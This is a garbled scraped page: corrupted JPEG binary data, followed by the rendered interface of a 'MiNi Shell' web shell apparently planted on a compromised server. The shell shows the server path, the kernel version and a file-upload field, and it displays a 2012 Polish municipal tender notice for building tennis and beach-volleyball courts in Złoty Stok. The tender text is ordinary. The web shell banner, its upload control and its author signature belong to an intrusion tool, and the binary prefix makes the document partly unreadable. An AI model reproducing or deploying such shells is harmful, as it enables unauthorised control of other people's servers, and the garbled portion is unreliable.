JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120529/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120529/177314-N-2012.html

<p class="kh_header"><b>Złoty Stok: Budowa kortu tenisowego i boiska do siatkówki plażowej przy CKiP w Złotym Stoku</b><br>
<b>Numer ogłoszenia: 177314 - 2012; data zamieszczenia: 29.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złoty Stok , ul. Rynek 22, 57-250 Złoty Stok, tel. 0 74 8164164, faks 0 74 8164133.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kortu tenisowego i boiska do siatkówki plażowej przy CKiP w Złotym Stoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest inwestycja polegająca na Budowie kortu tenisowego i boiska do siatkówki plażowej przy CKiP w Złotym Stoku,  na działce nr ewid. gruntów 357 obręb Złoty Stok, przy ulicy 3 Maja 10.  W skład kompleksu wchodzić będzie kort tenisowy i boisko do siatkówki plażowej o nawierzchniach z kruszyw naturalnych, o strukturze przepuszczalnej dla wód opadowych i roztopowych, pod którymi ułożony będzie drenaż odprowadzający wody poprzez przyłącze do istniejącej kanalizacji. Wokół kortu i północnej granicy działki nr 357, od strony budynku nr 12 wykonane będzie nowe ogrodzenie z siatki na słupkach stalowych o wysokości 4m. Zamówienie przewiduje również dostawę wyposażenia kortu i boiska do siatkówki plażowej.   

W zakresie robót do wykonania są:
 
I. Prace przygotowawcze i zabezpieczające terenu robót .
-prace zabezpieczające miejsce prowadzonych robót przed osobami postronnymi wraz z właściwym oznakowaniem,
-organizacja placu budowy. (Uwaga zgodnie z zapisami umowy: wywóz i unieszkodliwienie odpadów, nadmiaru ziemi, doprowadzenie energii elektrycznej i wody na potrzeby wykonywanych prac, uzyskanie zgody na zajęcie ulic i chodników na czas budowy oraz korzystania z nieruchomości sąsiedniej należy do obowiązków Wykonawcy).

II. Prace dotyczące kortu.
Roboty rozbiórkowe.
-rozebranie elementów betonowych  podłoża istniejącego kortu - 518.49m2,
-rozbiórka elementów istniejącego ogrodzenia, przyjęto  rozbiórkę żelbetowych słupów ogrodzenia wraz z siatką ogrodzeniową, bramą i furtką, 

Roboty ziemne.
-roboty pomiarowe - 0.147ha,
-usunięcie warstwy ziemi i podsypki pod płytami betonowymi wraz z jej przemieszczeniem - grubość warstwy do 15cm - 864.15m2,

Roboty w zakresie ułożenia obrzeży chodnikowych. 
-wykonanie rowków  pod krawężniki i ławy krawężnikowe w gruncie - 104.6m,
-wykonanie podsypki piaskowej wraz z zagęszczeniem w rowkach pod obrzeża - 26.150m2,
-wykonanie ławy betonowej z betonu min B-15 z oporem pod obrzeża - 6.119m3,
-ułożenie obrzeży betonowych (Uwaga:  zastosować obrzeża z nakładką gumową lub EPDM ) o wymiarach 100x30x8cm - 104.6m,

Roboty w zakresie drenażu. 
-wykonanie wykopów liniowych pod ciągi drenażowe o głębokości do 1.5m, szerokości 0.8-1,5m - 30.415m3,
-wykonanie podsypki filtracyjnej z kruszywa płukanego, żwir płukany o granulacji 8-16mm grubość warstwy min 10cm - 5.530m3,
-ułożenie rur drenarskich PEHD o średnicy zewnętrznej 113mm - 158.0m,
-wykonanie obsypki filtracyjnej z kruszywa płukanego żwir płukany o granulacji 8-16mm - 24.885m3,
-owinięcie rurociągu drenażowego i obsypki geowłókiną - 158.0m,
-montaż 4 kompletnych studzienek typu Wavin lub równoważnych o średnicy min 315mm.

Roboty w zakresie podbudowy i nawierzchni kortu oraz pobocza.
-wykonanie warstwy odsączającej kortu z kruszywa kamiennego 0,5-63mm o średniej
grubości warstwy 18,5cm po  zagęszczeniu (od 12 do 25cm) na istniejącej nawierzchni asfaltowej z wypoziomowaniem podłoża. 
-Wykonanie, na poboczach,  nawierzchni trawiastej siewem z pielęgnacją w okresie wzrostu (zalecane zastosowanie trawy w rolkach)  z warstwą wegetacyjną z humusu 12.5cm, pod  nawierzchnią wegetacyjną wykonać  podsypkę filtracyjną z piasku płukanego 0-2mm, - grubość warstwy po zagęszczeniu 15cm oraz w pasie o szerokości 1,2-1,3m dookoła kortu ( pas filtracyjny, pod którym wykonane będą ciągi drenażowe), podbudowę z kruszywa kamiennego 5-63mm o grubości warstwy po zagęszczeniu 10cm wraz z okrywą z geowłókniny, 
-wykonanie podbudowy dynamicznej z kruszywa mineralnego naturalnego typu Eurokort lub równoważnego, kolor czerwony - ceglany, grubość warstwy 3cm - 605.00m2,
-wykonanie nawierzchni tenisowej z kruszywa mineralnego naturalnego typu Eurokort lub równoważnego, kolor czerwony - ceglany grubość warstwy 0,5cm - 605.00m2,
Uwaga: W nawierzchni należy zamontować kompletny system  6 wynurzalnych zraszaczy sterowanych automatycznie z czujnikami wilgotności nawierzchni, podłączonych do istniejącego przyłącza wodnego, znajdującego się na terenie     istniejącego kortu.     

Prace  w zakresie ogrodzeń i piłkochwytów.
-wykonanie wykopów pod stopy fundamentowe ogrodzenia i piłkochwyty - 32.775m3,
-wykonanie stóp betonowych pod ogrodzenie (słupki) i piłkochwyty, z betonu min B-20 o wymiarach  50x50x90cm - 31.05m3, 
-wykonanie ogrodzenia z siatki stalowej ocynkowanej, powlekanej tworzywem sztucznym w kolorze zielonym, o oczkach 45x45mm, naciąganej przy pomocy drutu, o wys. 4m., na słupkach stalowych z kształtowników  60x60x2.5mm w rozstawie 2.5m, mocowanych w stopach - 150.850m,
-wykonanie wrót o szer. 4,0m i wys. 2.5m  i furtki o szer. 1,0m i wys. 2.0m z pasem  dolnym o wys. 25 cm, wypełnionym blachą w ramach stalowych z kątownika 40x40x3mm wypełnionych siatką  o oczkach 45x45mm - 1kpl,
-wykonanie piłkochwytów o wysokości 6m i długości 18m z siatki elastycznej, zbrojonej drutem  powlekanej tworzywem sztucznym, na słupkach aluminiowych 80x80x5mm w rozstawie max.3.0m -  216.0m2 (siatka o oczkach 45x45mm) słupki  demontowalne z tulejami,    

Dostawa i montaż wyposażenia sportowego 
-wykonanie wykopów pod fundamenty słupków do tenisa- 0.3m3, 
-wykonanie stóp betonowych z betonu B-20 o wymiarach 0.5x0.5x0.6m - 0.3m3,
-dostawa i montaż dwóch słupków demontowalnych do tenisa ziemnego, aluminiowych z profilu owalnego 120x100mm, z wewnętrznym naciągiem śrubowym siatki i regulowaną  wysokością, z miękkimi osłonami bezpieczeństwa, zapinanymi na rzepy - 1kpl, 
-dostawa siatki do tenisa ziemnego plecionej z linki z tworzywa sztucznego o grubości 2.3-2.5mm z taśmą środkową z PE lub PP, z podpórkami bocznymi i naciągiem środkowym (ciężarek lub tuleja naciągowa mocowana w podłożu) - 2szt.,
-dostawa i montaż linii kortu z  taśmy PP o szer 5cm wraz z systemem mocowania - 2kpl,
-dostawa krzesła sędziowskiego do tenisa ziemnego - stalowe, lakierowane proszkowo na kolor biały - 1kpl,
-dostawa siatki do równania powierzchni kortu z tkaniny PE, o oczkach 2x2cm z uchwytem drewnianym  i linką do ciągnięcia szer - 2.0m, dł - 1.5m, 
-dostawa urządzenia do czyszczenia linii - 1szt,    

III. Prace dotyczące boiska do siatkówki plażowej.
Roboty rozbiórkowe.
-rozbiórka elementów istniejącego ogrodzenia,

Roboty ziemne.
-roboty pomiarowe - 0.036ha,
-usunięcie warstwy humusu o grubości do 30cm- 336.00m2,

Roboty w zakresie drenażu.
-wykonanie wykopów liniowych pod ciągi drenażowe o głębokości do 1.5m, szerokości 0.8-1,5m - 10.973m3,
-wykonanie podsypki filtracyjnej z kruszywa płukanego, żwir płukany o granulacji 8-16mm grubość warstwy min 10cm - 1.995m3,
-ułożenie rur drenarskich PEHD o średnicy zewnętrznej 113mm - 57.0m,
-wykonanie obsypki filtracyjnej z kruszywa płukanego żwir płukany o granulacji 8-16mm - 8.978m3,
-owinięcie rurociągu drenażowego i obsypki geowłókiną - 57.0m,

Roboty w zakresie nawierzchni boiska do siatkówki plażowej.
-Wykonanie nawierzchni z piasku przesiewanego drobnoziarnistego 0-2mm, grubość warstwy - 30cm, pod warstwą piasku geowłóknina na całej szerokości boiska -  336.00m2, 

Prace  w zakresie ogrodzeń.
-wykonanie wykopów pod stopy fundamentowe ogrodzenia  - 7.125m3,
-wykonanie stóp betonowych pod ogrodzenie (słupki), z betonu min B-20 o wymiarach  50x50x90cm - 3.375m3, 
-wykonanie ogrodzenia z siatki stalowej ocynkowanej, powlekanej tworzywem sztucznym w kolorze zielonym, o oczkach 65x65mm, naciąganej przy pomocy drutu, o wys. 4m, na słupkach stalowych z kształtowników  60x60x2.5mm w rozstawie 2.5m, mocowanych w stopach - 35.00m,

Dostawa i montaż wyposażenia sportowego.
-wykonanie wykopów pod fundamenty słupków do siatkówki- 0.3m3, 
-wykonanie stóp betonowych z betonu B-20, o wymiarach 0.5x0.5x0.6m - 0.3m3,
-dostawa i montaż dwóch słupków demontowalnych do siatkówki plażowej, aluminiowych z profilu owalnego 120x100mm, z  mechanizmem naciągowym i regulowaną  wysokością siatki, z miękkimi osłonami bezpieczeństwa zapinanymi na rzepy - 1kpl, 
-dostawa siatki do siatkówki plażowej, czarnej z taśmami czerwonymi  - 2szt.,
-dostawa i montaż linii boiskowych z taśmy PP o szer 5 -8cm w kolorze ciemnoniebieskim o regulowanej długości wraz z systemem mocowania - 2kpl, 

IV. Roboty w zakresie przyłącza odprowadzającego wody do istniejącej kanalizacji. 
-wykonanie wykopów liniowych pod rurociąg - 36,792m3 ,
-wykonanie podsypki z kruszywa płukanego, żwir płukany o granulacji 8-16mm grubość warstwy min 15cm - 5.256m3,
-ułożenie kanałów z rur PVC o o 160mm - 35.8m,  o 200mm - 22.6m,
-wykonanie obsypki piaskowej rur grubość warstwy - 30cm - 10.835m3,
-zasypanie wykopów - 32.120m3,
-montaż 4 kompletnych studzienek typu Wavin lub rónoważnych - 4szt

V. Prace wykończeniowe
-wykonanie trawników dywanowych siewem na warstwie wegetatywnej z humusu, wraz z ich pielęgnacją w okresie wzrostu (zalecane zastosowanie trawy w rolkach) - 864,15m2,
-wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
-uporządkowanie budowy i przyległych terenów,
-wykonanie dokumentacji powykonawczej w tym:  kosztorysu powykonawczego, 
geodezyjnej inwentaryzacji powykonawczej.

Uwaga: Dokumenty wymagane dla nawierzchni sportowych.
-Karta techniczna kruszywa nawierzchni,
-Atest PZH kruszywa nawierzchni, lub inny dokument potwierdzający przydatność surowca do wykorzystania w nawierzchni sportowej,
-Autoryzacja producenta nawierzchni kruszywowej wraz z potwierdzeniem gwarancji min 5 lat..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.27.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wymagane dla nawierzchni sportowych.
-Karta techniczna kruszywa nawierzchni,
-Atest PZH kruszywa nawierzchni, lub inny dokument potwierdzający przydatność surowca do wykorzystania w nawierzchni sportowej,
-Autoryzacja producenta nawierzchni kruszywowej wraz z potwierdzeniem gwarancji min 5 lat.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlotystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok. 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 10:00, miejsce: Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok. 7 sekretariat Urzędu - w godz. pracy Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich Europa inwestujaca w obszary wiejskie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com